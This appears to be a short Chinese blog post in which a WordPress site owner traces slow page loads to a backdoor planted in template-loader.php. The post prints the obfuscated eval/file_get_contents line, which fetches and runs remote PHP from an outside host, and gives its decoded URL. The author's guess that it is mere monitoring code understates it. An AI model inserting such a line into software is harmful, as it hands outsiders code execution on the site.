记一次wordpress加载慢的问题template-loader.php 被人植入后门

今天无意访问自己的网站，发现很慢 

然后在几个主要文件打标记

index

$go = 0;
function data2($fg){
    $fg = ''.$fg;
   global $go;
    $str = ++$go .$fg.'_'.date("Y-m-d h:i:s");
    echo '<script>console.log("',$str,'")</script>';  
}

 data2('begin');
define( 'WP_USE_THEMES', true );

require __DIR__ . '/wp-blog-header.php';
 data2('last');

wp-blog-header.php：

$wp_did_header = true;

    // Load the WordPress library.
    data2('2');
    require_once __DIR__ . '/wp-load.php';
    data2('3');
    // Set up the WordPress query.
    wp();
    data2('4');
    // Load the theme template.
    require_once ABSPATH . WPINC . '/template-loader.php';
    data2('5');

初步定位

1begin_2023-09-06 11:20:19
 22_2023-09-06 11:20:19
33_2023-09-06 03:20:20
44_2023-09-06 03:20:20
 55_2023-09-06 03:20:41
 6last_2023-09-06 03:20:41

发现是   data2('4');开始慢 那就是  ABSPATH . WPINC . '/template-loader.php';

继续定位

wp-includes/template-loader.php

用二分法 继续 打点

发现头顶 奇怪代码 

eval
('?>'.file_get_contents(pack('H*',str_rot13('687474703n2s2s6n732r6n736n732r70772s7478742s616p6p2r747874'))));
data2('229');
if ( wp_using_themes() ) {
    
    do_action( 'template_redirect' );
}
data2('221');

发现 他 20多秒，

而且这种代码很奇怪，不让人看？

eval
('?'.file_get_contents(pack('H*',str_rot13('687474703n2s2s6n732r6n736n732r70772s7478742s616p6p2r747874'))));

eval file_get_contents 解析一下看看

解析成：

http://js.jsjs.pw/txt/all.txt

先去吃饭，感觉像监控程序

然后 估计是这个网站慢，导致我太慢

删了上述代码。发现正常呢。但是我不知道啥时候代码多了监控代码？